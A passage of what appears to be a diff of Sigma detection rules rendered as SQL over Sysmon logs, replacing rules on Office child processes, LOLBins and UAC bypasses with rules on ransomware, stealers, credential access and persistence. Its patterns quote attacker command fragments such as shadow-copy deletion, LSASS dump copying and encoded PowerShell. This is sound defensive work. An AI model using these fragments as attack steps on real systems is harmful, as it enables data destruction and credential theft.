Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Unknown" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Potential Encoded PowerShell Patterns In CommandLine", - "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "status": "test", - "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "status": "experimental", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encoding_patterns.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "status": "experimental", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", - "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ], + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", + "status": "test", + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", - "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", - "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "test", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Uses 